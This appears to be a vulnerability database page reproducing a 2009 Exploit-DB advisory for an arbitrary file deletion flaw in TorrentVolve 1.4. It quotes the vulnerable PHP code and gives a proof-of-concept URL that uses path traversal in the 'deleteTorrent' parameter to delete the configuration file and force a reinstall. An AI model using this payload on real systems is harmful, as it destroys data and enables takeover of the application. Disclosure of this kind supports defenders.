Lucene search
+L

TorrentVolve 1.4 - 'deleteTorrent' Delete Arbitrary File

🗓️ 11 Jun 2009 00:00:00Reported by Br0lyType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 29 Views

TorrentVolve 1.4 'deleteTorrent' Delete Arbitrary Fil

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2009-2101
11 Jun 200900:00
circl
CVE
CVE-2009-2101
17 Jun 200917:00
cve
Cvelist
CVE-2009-2101
17 Jun 200917:00
cvelist
EUVD
EUVD-2009-2097
7 Oct 202500:30
euvd
NVD
CVE-2009-2101
17 Jun 200917:30
nvd
OpenVAS
TorrentVolve archive.php XSS Vulnerability
26 Jun 200900:00
openvas
OpenVAS
TorrentVolve archive.php XSS Vulnerability
26 Jun 200900:00
openvas
Prion
Directory traversal
17 Jun 200917:30
prion
----------------------------------------------------------------------------------------------------

  Name : Torrent Volve
  Site : http://sourceforge.net/projects/torrentvolve/
  Down : http://sourceforge.net/project/showfiles.php?group_id=179905&package_id=207933&release_id=476030

----------------------------------------------------------------------------------------------------


  Found By : br0ly
  Made in  : Brasil
  Contact  : br0ly[dot]Code[at]gmail[dot]com

----------------------------------------------------------------------------------------------------

  Description:

  Bug : Delete Arbitrary file.

  Look this in: archive.php; Lines 194 - 199

  if(isset($_GET['deleteTorrent'])) {

                //delete Torrent from file system
                unlink($userDir . '/' . $_GET['deleteTorrent']);
                echo '  <div class="divStatus">' . $_GET['deleteTorrent'] . ' deleted.</div>' . "\n";
        }

  Then after login we can delete files, if you delete the configuration file you can install the script again.


----------------------------------------------------------------------------------------------------

  P0c:

    http://localhost/Scripts/torrentvolve/archive.php?deleteTorrent=../../../config/configuration.xml

  To install again go to:

    http://localhost/Scripts/torrentvolve/


  OBS: need register_globals=on;

----------------------------------------------------------------------------------------------------

# milw0rm.com [2009-06-11]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Jun 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.8
EPSS0.0192
29